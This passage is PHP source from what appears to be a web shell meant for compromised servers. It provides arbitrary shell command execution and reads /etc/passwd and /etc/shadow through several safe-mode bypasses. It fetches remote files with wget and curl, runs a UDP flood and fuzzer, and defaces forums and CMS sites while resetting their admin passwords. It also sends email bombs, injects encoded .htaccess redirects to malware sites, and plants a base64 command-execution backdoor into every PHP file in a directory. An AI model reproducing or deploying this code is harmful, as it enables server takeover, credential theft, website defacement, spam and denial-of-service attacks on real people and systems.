}
if($coun == 1)
echo "<center>Done !!!!<center>";
else
echo "<center>Cannot open files !!!!<center>";
}
else if(isset($_GET['redirect']))
{
if($myfile = fopen(".htaccess",'a'))
{
$mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA
/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLv
Ukl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRW
HLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
fwrite($myfile, gzuncompress(base64_decode($mal)));
fwrite($myfile, "\n\r");
fclose($myfile);
echo "<center>Done !!!!<center>";
}
else
echo "<center>Cannot open file !!!!<center>";
}
else if(isset($_GET['malware']))
{ ?>
<input type="hidden" id="malpath" value="<?php echo $_GET["dir"]; ?>">
<center><table><tr><td><a href=# onClick="malwarefun('infect')"><font cl
ass=txt size="4">| Infect Users |</font></a></td>
<td><a href=javascript:void(0) onClick="malwarefun('redirect')"><font cl
ass=txt size="4">| Redirect Search Engine TO Malwared site |</font></a></td></tr
></table></center>
<div id="showmal"></div>
<?php
}
else if(isset($_GET['codeinsert']))
{
if($file1 = fopen(".htaccess",'r'))
{
?><div id="showcode"></div>
<form method=post>
<textarea rows=9 cols=110 name="code" class=box><?php while(!feof($file1
)) { echo fgets($file1); } ?></textarea><br>
<input type="button" onClick="codeinsert(code.value)" value=" Insert "
class=but>
</form>
<?php }
else
echo "<center>Cannot Open File!!</center>";
}
else if(isset($_POST['getcode']))
{
if($myfile = fopen(".htaccess",'a'))
{
fwrite($myfile, $_POST['getcode']);
fwrite($myfile, "\n\r");
fclose($myfile);
echo "<font class=txt>Code Inserted Successfully!!!!</font>";
}
else
echo "Permission Denied";
}
else if(isset($_GET['uploadurl']))
{
$functiontype = trim($_GET['functiontype']);
$wurl = trim($_GET['wurl']);
$path = magicboom($_GET['path']);
function remotedownload($cmd,$url)
{
$namafile = basename($url);
switch($cmd)
{
case 'wwget':
execmd(which('wget')." ".$url." -O ".$namafile);
break;
case 'wlynx':
execmd(which('lynx')." -source ".$url." > ".$nam
afile);
break;
case 'wfread' :
execmd($wurl,$namafile);
break;
case 'wfetch' :
execmd(which('fetch')." -o ".$namafile." -p ".$u
rl);
break;
case 'wlinks' :
execmd(which('links')." -source ".$url." > ".$na
mafile);
break;
case 'wget' :
execmd(which('GET')." ".$url." > ".$namafile);
break;
case 'wcurl' :
execmd(which('curl')." ".$url." -o ".$namafile);
break;
default:
break;
}
return $namafile;
}
$namafile = remotedownload($functiontype,$wurl);
$fullpath = $path . $directorysperator . $namafile;
if(is_file($fullpath))
{
echo "<center><font class=txt>File uploaded to $fullpath</font><
/center>";
}
else
echo "<center>Failed to upload $namafile</center>";
}
else if(isset($_GET['createfolder']))
{
if(!mkdir($_GET['createfolder']))
echo "Failed To create";
else
echo "<font class=txt>Folder Created Successfully</font>";
}
else if(isset($_GET['selfkill']))
{
if(unlink(__FILE__))
echo "<br><center><font size=5>Good Bye......</font></center>";
else
echo "<br><center><font size=5>Shell cannot be removed......</fo
nt></center>";
}
else if(isset($_GET['Create']))
{
?>
<form method="post">
<input type="hidden" name="filecreator" value="<?php echo $_GET[
'Create']; ?>">
<textarea name="filecontent" rows="12" cols="100" class="box"></
textarea><br />
<input type="button" onClick="createfile(filecreator.value,filecontent.v
alue)" value=" Save " class="but"/>
</form>
<?php }
else if(isset($_POST['filecreator'])&&isset($_POST['filecontent']))
{
$content = $_POST['filecontent'];
if($file_pointer = fopen($_POST['filecreator'], "w+"))
{
fwrite($file_pointer, $content);
fclose($file_pointer);
echo "<font class=txt>File Created Successfully</font>";
}
else
echo "Cannot Create File";
}
else if(isset($_REQUEST["defaceforum"]))
{
?>
<center><div id="showdeface"></div>
<font color="#FF0000" size="4">Forum Index Changer</font>
<form action="<?php echo $self; ?>" method = "POST">
<input type="hidden" name="forum">
<input type="hidden" name="defaceforum">
<table border = "1" width="60%" style="text-align: center;border
-color:#333333;" align="center">
<tr>
<td height="50" width="50%"> <b>Host : </b><inpu
t class="sbox" type="text" name="f1" size="20" value="localhost"></td>
<td width="50%"><b> Database :</b> <input type =
"text" class="sbox" name = "f2" size="20"></td></tr>
<tr><td height="50" width="50%"><b>User :</b> <i
nput type ="text" class="sbox" name = "f3" size="20"> </td>
<td><b> Password :</b> <input class="sbox"
type ="text" name = "f4" size="20"></td></tr>
<tr><td height="50" width="50%">Type :
<select class=sbox id="forumdeface" name="forumd
eface" onChange="checkforum(this.value)">
<option value="vb">vbulletin</option>
<option value="mybb">Mybb</option>
<option value="smf">SMF</option>
<option value="ipb">IPB</option>
<option value="wp">Wordpress</option>
<option value="joomla">Joomla</option>
</select></td>
<td height="50" width="50%">Prefix : <input type
="text" id="tableprefix" name="tableprefix" class="sbox"></td></td>
</tr>
<tr>
<td height="167" width="50%" colspan=2>
<div style="display:none;" id="myjoomla"><p><b>S
ite URL : </b><input class="box" type="text" name="siteurl" width="80" value="ht
tp://site.com/administrator/"></p></div>
<div style="display:none;" id="smfipb"><p align=
"center"><b>Head : </b><input class="sbox" type="text" name="head" size="20" val
ue="Hacked"> <b>Kate ID : </b><input class="sbox" type="text" name="f5" si
ze="20" value="1">
<label id="wordpres" style="display:none; float:
right; margin-right:8%;"><input type="checkbox" name="all" value="All" checked="

checked"> All</label></p>
</div>
<p align="center"> <textarea class="box" na
me="index" cols=53 rows=8><b>lol ! You Are Hacked !!!!</b></textarea><p align="c
enter">
<input type="button" onClick="forumdefacefn(inde
x.value,f1.value,f2.value,f3.value,f4.value,forumdeface.value,tableprefix.value,
siteurl.value,head.value,all.value,f5.value)" class="but" value = "Hack It">
</td>
</tr>
</table>
</form>
</center>
<?php
}
else if(isset($_GET["passwordchange"]))
{
echo "<center>";
?>
<div id="showchangepass"></div>
<font color="#FF0000" size="4">Forum Password Changer</f
ont>
<form onSubmit="changeforumpassword('forumpass',f1.value
,f2.value,f3.value,f4.value,forums.value,tableprefix.value,ipbuid.value,newipbpa
ss.value,username.value,newjoomlapass.value,uid.value,uname.value,newpass.value)
;return false;">
<table border = "1" width="60%" height="246" style="text
-align: center;border-color:#333333;" align="center">
<tr>
<td height="50" width="50%"> <b>Host : <
/b><input class="sbox" type="text" name="f1" size="20" value="localhost"></td><t
d height="50" width="50"> <b> DataBase :</b> <input type ="text" class="sb
ox" name = "f2" size="20"></td> <tr><td height="50" width="50%"> <b>User :<
/b> <input type ="text" class="sbox" name = "f3" size="20"></td><td height="50"
width="50%"> <b>Password :</b> <input class="sbox" type ="text" name = "f4
" size="20"></td></tr>
<tr>
<td height="50" width="50%">Type :
<select class=sbox id="forums" name="for
ums" onChange="showMsg(this.value)">
<option value="vb">vbulletin</option>
<option value="mybb">Mybb</option>
<option value="smf">SMF</option>
<option value="ipb">IPB</option>
<option value="phpbb">PHPBB</option>
<option value="wp">Wordpress</option>
<option value="joomla">Joomla</option>
</select></td>
<td height="50" width="50%">Prefix : <in
put type="text" id="tableprefix" name="tableprefix" class="sbox"></td>
</tr>
<tr>
<td colspan=2 height="100" width="780">
<p align="center"><div id="fid" style="d
isplay:block;"><b>User ID :</b> <input class="sbox" type="text" name="ipbuid" si
ze="20" value="1"> <b>New Password :</b> <input type ="text" class="sbox" n
ame = "newipbpass" size="20" value="hacked"></div>
<div id="joomla" style="display:none;"><

b>New Username :</b> <input style="width:170px;" class="box" type="text" name="u
sername" size="20" value="admin"> <b>New Password :</b> <input type ="text"
class="sbox" name = "newjoomlapass" size="20" value="hacked"></div>
<div id="wpress" style="display:none;"><
p><b>User ID :</b> <input class="sbox" type="text" name="uid" size="20" value="1
"> <b>New Password :</b> <input type ="text" class="sbox" name = "newpass"
size="20" value="hacked"></p><b>New Username :</b> <input style="width:170px;" c
lass="box" type="text" name="uname" size="20" value="admin"></div>
<p><input type = "button" onClick="chang
eforumpassword('forumpass',f1.value,f2.value,f3.value,f4.value,forums.value,tabl
eprefix.value,ipbuid.value,newipbpass.value,username.value,newjoomlapass.value,u
id.value,uname.value,newpass.value)" class="but" value = " Change IT " name="f
orumpass"></p></td>
</tr>
</table>
</form>
</center>
<?php
}
else if(isset($_GET['dosser']))
{
if(isset($_GET['ip']) && isset($_GET['exTime']) && isset($_GET['port'])
&& isset($_GET['timeout']) && isset($_GET['exTime']) && $_GET['exTime'] != "" &
&
$_GET['port'] != "" && $_GET['ip'] != "" &&
$_GET['timeout']
!= "" && $_GET['exTime'] != "" )
{
$IP=$_GET['ip'];
$port=$_GET['port'];
$executionTime = $_GET['exTime'];
$no0fBytes = $_GET['no0fBytes'];
$data = "";
$timeout = $_GET['timeout'];
$packets = 0;
$counter = $no0fBytes;
$maxTime = time() + $executionTime;;
while($counter--)
{
$data .= "X";
}
$data .= " Dhanush";
while(1)
{
$socket = fsockopen("udp://$IP", $port, $error,
$errorString, $timeout);
if($socket)
{
fwrite($socket , $data);
fclose($socket);
$packets++;
}
if(time() >= $maxTime)
{
break;
}
}
echo "Dos Completed!<br>";
echo "DOS attack against udp://$IP:$port completed on ".
date("h:i:s A")."<br />";
echo "Total Number of Packets Sent : " . $packets . "<br
/>";
echo "Total Data Sent = ". HumanReadableFilesize($packet
s*$no0fBytes) . "<br />";
echo "Data per packet = " . HumanReadableFilesize($no0fB
ytes) . "<br />";
}
}
else if(isset($_GET['fuzzer']))
{
if(isset($_GET['ip']) && isset($_GET['port']) && isset($_GET['timeout'])
&& isset($_GET['exTime']) && isset($_GET['no0fBytes']) && isset($_GET['multipli
er']) && $_GET['no0fBytes'] != "" && $_GET['exTime'] != "" && $_GET['timeout'] !
= "" && $_GET['port'] != "" && $_GET['ip'] != "" && $_GET['multiplier'] != "")
{
$IP=$_GET['ip'];
$port=$_GET['port'];
$times = $_GET['exTime'];
$timeout = $_GET['timeout'];
$send = 0;
$ending = "";
$multiplier = $_GET['multiplier'];
$data = "";
$mode="tcp";
$data .= "GET /";
$ending .= " HTTP/1.1\n\r\n\r\n\r\n\r";
if($_GET['type'] == "tcp")
{
$mode = "tcp";
}
while($multiplier--)
{
$data .= urlencode($_GET['no0fBytes']);
}
$data .= "%s%s%s%s%d%x%c%n%n%n%n";// add some format string specifiers
$data .= "by-Dhanush".$ending;
$length = strlen($data);
echo "Sending Data :- <br /> <p align='center'>$data</p>";
for($i=0;$i<$times;$i++)
{
$socket = fsockopen("$mode://$IP", $port, $error, $errorString, $tim
eout);
if($socket)
{
fwrite($socket , $data , $length );
fclose($socket);
}
}
echo "Fuzzing Completed!<br>";
echo "DOS attack against $mode://$IP:$port completed on ".date("h:i:s A"
)."<br />";
echo "Total Number of Packets Sent : " . $times . "<br />";
echo "Total Data Sent = ". HumanReadableFilesize($times*$length) . "<br

/>";
echo "Data per packet = " . HumanReadableFilesize($length) . "<br />";
}
}
else if(isset($_GET['bypassit']))
{
if(isset($_GET['copy']))
{
if(@copy($_GET['copy'],"test1.php"))
{
$fh=fopen("test1.php",'r');
echo "<textarea cols=120 rows=20 class=box readonly>".ht
mlspecialchars(@fread($fh,filesize("test1.php")))."</textarea></br></br>";
@fclose($fh);
unlink("test1.php");
}
}
else if(isset($_GET['imap']))
{
$string = $_GET['imap'];
echo "<textarea cols=120 rows=20 class=box readonly>";
$stream = imap_open($string, "", "");
$str = imap_body($stream, 1);
echo "</textarea>";
}
else if(isset($_GET['sql']))
{
$file=$_GET['sql'];
$mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/
etc/proftpd.conf";
$mysql_files = explode(':', $mysql_files_str);
$sql = array (
"USE $mdb",
'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ())
. ' (a LONGBLOB)',
"LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl
FIELDS "
. "TERMINATED BY
'__THIS_NEVER_HAPPENS__'
"
. "ESCAPED BY
'' "
. "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'"
,
"SELECT a FROM $tbl LIMIT 1"
);
mysql_connect ($mhost, $muser, $mpass);
foreach ($sql as $statement) {
$q = mysql_query ($statement);
if ($q == false) die (
"FAILED: " . $statement . "\n" .
"REASON: " . mysql_error () . "\n"
);
if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
echo htmlspecialchars($r[0]);
mysql_free_result ($q);
}
echo "</textarea>";
}
else if(isset($_GET['curl']))
{
$ch=curl_init("file://" . $_GET[curl]);
curl_setopt($ch,CURLOPT_HEADERS,0);
$file_out=curl_exec($ch);
curl_close($ch);
echo "<textarea cols=120 rows=20 class=box readonly>".htmlspecia
lchars($file_out)."</textarea></br></br>";
}
else if(isset($_GET['include']))
{
if(file_exists($_GET['include']))
{
@include($_GET['include']);
echo "</textarea>";
}
else
echo "<br><center><font size=3>Can't Read" . $_GET['inc
lude'] . "</font></center>";
}
else if(isset($_GET['id']))
{
for($uid=0;$uid<60000;$uid++)
{ //cat /etc/passwd
$ara = posix_getpwuid($uid);
if (!empty($ara))
{
while (list ($key, $val) = each($ara))
{
print "$val:";
}
print "\n";
}
}
echo "</textarea>";
break;
}
else if(isset($_GET['tempnam']))
{
$mytmp = tempnam ( 'tmp', $_GET['tempnam'] );
$fp = fopen ( $mytmp, 'r' );
while(!feof($fp))
echo fgets($fp);
fclose ( $fp );
}
else if(isset($_GET['symlnk']))
{
@mkdir("mydhanush",0777);
@chdir("mydhanush");
execmd("ln -s /etc/passwd");
echo file_get_contents("http://" . $_SERVER['HTTP_HOST'] . "/myd

hanush/passwd");
echo "</textarea>";
}
if(isset($_GET['newtype']))
{
$filename = $_GET['newtype'];
if($_GET['optiontype'] == "xxd")
echo execmd("xxd ".$filename);
else if($_GET['optiontype'] == "rev")
echo execmd("rev ".$filename);
if($_GET['optiontype'] == "tac")
echo execmd("tac ".$filename);
if($_GET['optiontype'] == "more")
echo execmd("more ".$filename);
if($_GET['optiontype'] == "less")
echo execmd("less ".$filename);
echo "</textarea>";
}
}
// Deface Website
else if(isset($_GET['deface']))
{
$myfile = fopen($_GET['deface'],'w');
if(fwrite($myfile, base64_decode($ind)))
{fclose($myfile);
echo "Index Defaced Successfully";}
else
echo "Donot have write permission";
}
else if(isset($_GET['perms']))
{
?>
<form>
<input type="hidden" name="myfilename" value="<?php echo $_GET['myfilepa
th']; ?>">
<table align="center" border="1" style="width:40%;border-color:#333333;"
>
<tr>
<td style="height:40px" align="right">Change Permissions </td><t
d align="center"><input value="0755" name="chmode" class="sbox" /></td>
</tr>
<tr>
<td colspan="2" align="center" style="height:60p
x">
<input type="button" onClick="changeperms(chmode.value,myfilename.value)
" value="Change Permission" class="but" style="padding: 5px;" /></td>
</tr>
</table>
</form>
<?php
}
else if(isset($_GET["chmode"]))
{
if($_GET['chmode'] != null && is_numeric($_GET['chmode']))
{
$perms = 0;
for($i=strlen($_GET['chmode'])-1;$i>=0;--$i)
$perms += (int)$_GET['chmode'][$i]*pow(8, (strlen($_GET['chmode'])-$
i-1));
if(@chmod($_GET['myfilename'],$perms))
echo "<center><blink><font class=txt>File Permissions Ch
anged Successfully</font></blink></center>";
else
echo "<center><blink>Cannot Change File Permissions</bli
nk></center>";
}
}
else if(isset($_GET['rename']))
{
?>
<form>
<table border="0" cellpadding="3" cellspacing="3">
<tr>
<td>File </td><td><input value="<?php echo $_GET['myfilepath'];?
>" name="file" class="box" /></td>
</tr>
<tr>
<td>To </td><td><input value="<?php echo $_GET['myfilepath'];?>"
name="to" class="box" /></td>
</tr>
<tr>
<td colspan="2"><input type="button" onClick="re
namefun(file.value,to.value)" value="Rename It" class="but" style="margin-left:
160px;padding: 5px;"/></td>
</tr>
</table>
</form>
<?php
}
else if(isset($_GET['renamemyfile']))
{
if(isset($_GET['to']) && isset($_GET['file']))
{
if(!rename($_GET['file'], $_GET['to']))
echo "Cannot Rename File";
else
echo "<font class=txt>File Renamed Successfully</font>";
}
}
else if(isset($_GET['open']))
{
if(is_file($_GET['myfilepath']))
{
$owner = "0/0";
if($os == "Linux")
$owner = getOGid($_GET['myfilepath']);
?>
<form>
<table style="width:57%;">
<tr align="left">
<td align="left">File : </td><td><font c
lass=txt><?php echo $_GET['myfilepath'];?></font></td><td align="left">Permissio
ns : </td><td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo
addslashes($_GET['myfilepath']); ?>')"><?php echo filepermscolor($_GET['myfilep
ath']);?></a></td>
</tr>
<tr>
<td>Size : </td><td><?php echo HumanRead
ableFileSize(filesize($_GET['myfilepath']));?></td><td>Owner/Group : </td><td><f
ont class=txt><?php echo $owner;?></font></td>
</tr>
</table>
<textarea name="content" rows="15" cols="100" class="box
"><?php
$content = htmlspecialchars(file_get_contents($_GET['myf
ilepath']));
if($content)
{
echo $content;
}
else if(function_exists('fgets') && function_exists('fop
en') && function_exists('feof'))
{
if(filesize($_GET['myfilepath']) != 0 )
{
fopen($_GET['myfilepath']);
while(!feof())
{
echo htmlspecialchars(fgets($_GE
T['myfilepath']));
}
}
}
?>
</textarea><br />
<input name="save" type="button" onClick="savemyfile('<?
php echo addslashes($_GET['myfilepath']); ?>',content.value)" value="Save Change
s" id="spacing" class="but"/>
</form>
<?php
}
else
echo "File does not exist !!!!";
}
else if(isset($_POST['file']) && isset($_POST['content']))
{
if(file_exists($_POST['file']))
{
$handle = fopen($_POST['file'],"w");
if(fwrite($handle,$_POST['content']))
echo "<font class=txt>File Saved Successfully!</font>";
else
echo "Cannot Write into File";
}
else
{
echo "File Name Specified does not exists!";
}
}
else if(isset($_POST["SendNowToZoneH"]))
{
$hacker = $_POST['defacer'];
$method = $_POST['hackmode'];
$neden = $_POST['reason'];
$site = $_POST['domain'];
if (empty($hacker))
{
die("<center><font size=3>[-] You Must Fill the Attacker name !
</font></center>");
}
elseif($method == "--------SELECT--------")
{
die("<center><font size=3>[-] You Must Select The Method !</cen
ter>");
}
elseif($neden == "--------SELECT--------")
{
die("<center><font size=3>[-] You Must Select The Reason</cente
r>");
}
elseif(empty($site))
{
die("<center><font size=3>[-] You Must Inter the Sites List !</
center>");
}
// Zone-h Poster
function ZoneH($url, $hacker, $hackmode,$reson, $site )
{
$k = curl_init();
curl_setopt($k, CURLOPT_URL, $url);
curl_setopt($k,CURLOPT_POST,true);
curl_setopt($k, CURLOPT_POSTFIELDS,"defacer=".$hacker."&domain1=
". $site."&hackmode=".$hackmode."&reason=".$reson);
curl_setopt($k,CURLOPT_FOLLOWLOCATION, true);
curl_setopt($k, CURLOPT_RETURNTRANSFER, true);
$kubra = curl_exec($k);
curl_close($k);
return $kubra;
}
$i = 0;
$sites = explode("\n", $site);
echo "<pre class=ml1 style='margin-top:5px'>";
while($i < count($sites))
{
if(substr($sites[$i], 0, 4) != "http")
{
$sites[$i] = "http://".$sites[$i];
}
ZoneH("http://zone-h.org/notify/single", $hacker, $method, $nede
n, $sites[$i]);
echo "<font class=txt size=3>Site : ".$sites[$i]." Posted !</fon
t><br>";
++$i;
}
echo "<font class=txt size=4>Sending Sites To Zone-H Has Been Completed
Successfully !! </font></pre>";
}
else if(isset($_GET['executemycmd']))
{
$comm = $_GET['executemycmd'];
chdir($_GET['executepath']);
echo shell_exec($comm);
}
// View Passwd file
else if(isset($_GET['passwd']))
{
$test='';
$tempp= tempnam($test, "cx");
$get = "/etc/passwd";
$name=@posix_getpwuid(@fileowner($get));
$group=@posix_getgrgid(@filegroup($get));
$owner = $name['name']. " / ". $group['name'];
?>
<table style="width:57%;">
<tr>
<td align="left">File : </td><td><font class=txt><?php echo $get
; ?></font></td><td align="left">Permissions : </td><td><?php echo filepermscolo
r($get);?></td>
</tr>
<tr>
<td>Size : </td><td><?php echo filesize($get);?></td><td>Owner/G
roup : </td><td><font class=txt><?php echo $owner;?></font></td>
</tr>
</table>
<?php
if(copy("compress.zlib://".$get, $tempp))
{
$fopenzo = fopen($tempp, "r");
$freadz = fread($fopenzo, filesize($tempp));
fclose($fopenzo);
$source = htmlspecialchars($freadz);
echo "<tr><td><center><textarea rows='20' cols='80' class=box na
me='source'>$source</textarea><br>";
unlink($tempp);
}
else
{
?>
<form>
<input type="hidden" name="etcpasswd">
<table class="tbl" border="1" cellpadding="5" cellspacin
g="5" align="center" style="width:40%;">
<tr>
<td>From : </td><td><input type="text" name="val
1" class="sbox" value="1"></td>
</tr>
<tr>
<td>To : </td><td><input type="text" name="val2"
class="sbox" value="1000"></td>
</tr>
<tr>
<td colspan="2" align="center"><input type="subm
it" value=" Go " class="but"></td>
</tr>
</table><br>
</form>
<?php
}
}
else if(isset($_GET['shadow']))
{
$test='';
$tempp= tempnam($test, "cx");
$get = "/etc/shadow";
if(copy("compress.zlib://".$get, $tempp))
{
$fopenzo = fopen($tempp, "r");
$freadz = fread($fopenzo, filesize($tempp));
fclose($fopenzo);
$source = htmlspecialchars($freadz);
echo "<tr><td><center><font size='3' face='Verdana'>$get</font><
br><textarea rows='20' cols='80' class=box name='source'>$source</textarea>";
unlink($tempp);
}
}
else if(isset($_GET['bomb']))
{
?><div id="showmail"></div>
<form>
<table id="margins" style="width:100%;">
<tr>
<td style="width:30%;">To</td>
<td>
<input class="box" name="to" value="victim@domai
n.com,victim2@domain.com" onFocus="if(this.value == 'victim@domain.com,victim2@d
omain.com')this.value = '';" onBlur="if(this.value=='')this.value='victim@domain
.com,victim2@domain.com';"/>
</td>
</tr>
<tr>
<td style="width:30%;">Subject</td>
<td>
<input type="text" class="box" name="subject" va
lue="Dhanush Here!" onFocus="if(this.value == 'Dhanush Here!')this.value = '';"
onBlur="if(this.value=='')this.value='Dhanush Here!';" />
</td>
</tr>
<tr>
<td style="width:30%;">No. of Times</td>
<td>
<input class="box" name="times" value="100" onFo
cus="if(this.value == '100')this.value = '';" onBlur="if(this.value=='')this.val
ue='100';"/>
</td>
</tr>
<tr>
<td style="width:30%;">Pad your message (Less spam detec
tion)</td>
<td><input type="checkbox" name="padding"/></td>
</tr>
<tr>
<td colspan="2"><textarea name="message" cols="110" rows
="10" class="box">Hello !! This is Dhanush!!</textarea></td>
</tr>
<tr>
<td rowspan="2">
<input style="margin : 20px; margin-left: 390px;
padding : 10px; width: 100px;" type="button" onClick="sendmail('dobombing',to.v
alue,subject.value,message.value,'null',times.value,padding.value)" class="but"
value="
Bomb! "/>
</td>
</tr>
</table>
</form>
<?php
}
//Mass Mailer
else if(isset($_GET['mail']))
{
?><div id="showmail"></div>
<div align="left">
<form>
<table align="left" style="width:100%;">
<tr>
<td style="width:10%;">From</td>
<td style="width:80%;" align="left"><input name="from" class
="box" value="Hello@abcd.in" onFocus="if(this.value == 'president@whitehouse.gov
')this.value = '';" onBlur="if(this.value=='')this.value='president@whitehouse.g
ov';"/></td>
</tr>
<tr>
<td style="width:20%;">To</td>
<td style="width:80%;"><input class="box" class="box" name="
to" value="victim@domain.com,victim2@domain.com" onFocus="if(this.value == 'vict
im@domain.com,victim2@domain.com')this.value = '';" onBlur="if(this.value=='')th
is.value='victim@domain.com,victim2@domain.com';"/></td>
</tr>
<tr>
<td style="width:20%;">Subject</td>
<td style="width:80%;"><input type="text" class="box" name="
subject" value="Dhanush Here!!" onFocus="if(this.value == 'Dhanush Here!!')this.
value = '';" onBlur="if(this.value=='')this.value='Dhanush Here!!';" /></td>
</tr>
<tr>
<td colspan="2">
<textarea name="message" cols="110" rows="10" class="box
">Hello !! This is Dhanush!!!</textarea>
</td>
</tr>
<tr>
<td rowspan="2">
<input style="margin : 20px; margin-left: 390px; padding
: 10px; width: 100px;" type="button" onClick="sendmail('massmailing',to.value,s
ubject.value,message.value,from.value)" class="but" value=" Send! "/>
</td>
</tr>
</table>
</form></div>
<?php
}
// Get Domains
else if(isset($_REQUEST["symlinkserver"]))
{
?>
<center><table><tr>
<td><a href=javascript:void(0) onClick="getdata('domains')"><font class=
txt><b>| Get Domains |</b></font></a></td>
<td><a href=javascript:void(0) onClick="getdata('symlink')"><font class=
txt><b>| Symlink Server |</b></font></a></td>
<td><a href=javascript:void(0) onClick="getdata('symlinkfile')"><font cl
ass=txt><b>| Symlink File |</b></font></a></td>
<td><a href=javascript:void(0) onClick="getdata('script')"><font class=t
xt><b>| Script Locator |</b></font></a></td>
</tr></table></center><br>
<div id="showdata"></div><?php
}
// Forum Manager
else if(isset($_REQUEST["forum"]))
{ ?>
<center><table><tr><td><a href=# onClick="getdata('defaceforum')"><font
class=txt size="4">| Forum Defacer |</font></a></td>
<td><a href=# onClick="getdata('passwordchange')"><font class=txt size="
4">| Forum Password Changer |</font></a></td>
</tr></table></center><br><div id="showdata"></div>
<?php
}
// Sec info
else if(isset($_GET['secinfo']))
{ ?><div id=showdata></div>
<center><div id="showmydata"></div>
</center>
<br><center><font color =red size=5>Server security information</font><br><br></
center>
<table style="width:100%;border-color:#333333;" border="1">
<tr>
<td style="width:7%;">Curl</td>
<td style="width:7%;">Oracle</td>
<td style="width:7%;">MySQL</td>
<td style="width:7%;">MSSQL</td>
<td style="width:7%;">PostgreSQL</td>
<td style="width:12%;">Open Base Directory</td>
<td style="width:10%;">Safe_Exec_Dir</td>
<td style="width:7%;">PHP Version</td>
<td style="width:7%;">Magic Quotes</td>
<td style="width:7%;">Server Admin</td>
</tr>
<tr>
<td style="width:7%;"><font class="txt"><?php curlinfo(); ?></fo
nt></td>
<td style="width:7%;"><font class="txt"><?php oracleinfo(); ?></
font></td>
<td style="width:7%;"><font class="txt"><?php mysqlinfo(); ?></f
ont></td>
<td style="width:7%;"><font class="txt"><?php mssqlinfo(); ?></f
ont></td>
<td style="width:7%;"><font class="txt"><?php postgresqlinfo();
?></font></td>
<td style="width:12%;"><font class="txt"><?php echo $basedir; ?>
</font></td>
<td style="width:10%;"><font class="txt"><?php if(@function_exis
ts('ini_get')) { if (''==($df=@ini_get('safe_mode_exec_dir'))) {echo "<font >NON
E</font></b>";}else {echo "<font color=green>$df</font></b>";};} ?></font></td>
<td style="width:7%;"><font class="txt"><?php phpver(); ?></font
></td>
<td style="width:7%;"><font class="txt"><?php magic_quote(); ?><
/font></td>
<td style="width:7%;"><font class="txt"><?php serveradmin(); ?><
/font></td>
</tr>
</table><br> <?php
mysecinfo();
}
// Code Injector
else if(isset($_GET['injector']))
{
?>
<form method='POST'>
<table id="margins">
<tr>
<td width="100" class="title">
Directory
</td>
<td>
<input class="box" name="pathtomass" value="<?php echo
getcwd().$SEPARATOR; ?>" />
</td>
</tr>
<tr>
<td class="title">
Mode
</td>
<td>
<select style="width: 400px;" name="mode" class="box">
<option value="Apender">Apender</option>
<option value="Overwriter">Overwriter</option>
</select>
</td>
</tr>
<tr>
<td class="title">
File Type
</td>
<td>
<input type="text" class="box" name="filetype" value="ph
p" onBlur="if(this.value=='')this.value='php';" />
</td>
</tr>
<tr>
<td>Create A backdoor by injecting this code in every ph
p file of current directory</td>
</tr>
<tr>
<td colspan="2">
<textarea name="injectthis" cols="110" rows="10" class="
box"><?php echo base64_decode("PD9waHAgJGNtZCA9IDw8PEVPRA0KY21kDQpFT0Q7DQoNCmlmK
Glzc2V0KCRfUkVRVUVTVFskY21kXSkpIHsNCnN5c3RlbSgkX1JFUVVFU1RbJGNtZF0pOyB9ID8+"); ?
></textarea>
</td>
</tr>
<tr>
<td rowspan="2">
: 10px; width: 100px;" type="button" onClick="codeinjector(pathtomass.value,mod
e.value,filetype.value,injectthis.value)" class="but" value="Inject "/>
</td>
</tr>
</form>
</table><div id="showinject"</div>
<?php
}
// Bypass
else if(isset($_GET["bypass"]))
{
?><center><div id="showbyp"></div></center>
<table cellpadding="7" align="center" border="3" style="width:70%;border
-color:#333333;">
<tr>
<td align="center" colspan="2"><font color="#FF0000" siz
e="3">Safe mode bypass</font></td>
</tr>
<tr>
<td align="center">
<p>Using copy() function</p>
<form onSubmit="bypassfun('copy',copy.value);ret
urn false;">
<input type="text" name="copy" value="/etc/passw
d" class="sbox"> <input type="button" OnClick="bypassfun('copy',copy.value)" val
ue="bypass" class="but">
</form>
</td>
<td align="center">
<p>Using imap() function</p>
<form onSubmit="bypassfun('imap'
,imap.value);return false;">
<input type="text" name="imap" v
alue="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('imap',
imap.value)" value="bypass" class="but">
</form>
</td>
</tr>
<tr>
<td align="center">
<p>Using sql() function</p>
<form onSubmit="bypassfun('sql',
sql.value);return false;">
<input type="text" name="sql" va
lue="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('sql',sq
l.value)" value="bypass" class="but">
</form>
</td>
<td align="center">
<p>Using Curl() function</p>
<form onSubmit="bypassfun('curl'
,curl.value);return false;">
<input type="text" name="curl" v
alue="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('curl',
curl.value)" value="bypass" class="but">
</form>
</td>
</tr>
<tr>
<td align="center">
<p>Bypass using include()</p>
<form onSubmit="bypassfun('inclu
de',include.value);return false;">
<input type="text" name="include
" value="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('inc
lude',include.value)" value="bypass" class="but">
</form>
</td>
<td align="center">
<p>Using id() function</p>
<form onSubmit="bypassfun('id',i
d.value);return false;">
<input type="text" name="id" val
ue="/etc/passwd" class="sbox"> <input type="button" OnClick="bypassfun('id',id.v
alue)" value="bypass" class="but">
</form>
</td>
</tr>
<tr>
<td align="center">
<p>Using tempnam() function</p>
<form onSubmit="bypassfun('tempn
am',tempname.value);return false;">
<input type="text" name="tempnam
e" value="../../../etc/passwd" class="sbox"> <input type="button" OnClick="bypas
sfun('tempnam',tempname.value)" value="bypass" class="but">
</form>
</td>
<td align="center">
<p>Using symlink() function</p>
<form onSubmit="bypassfun('symln
k',sym.value);return false;">
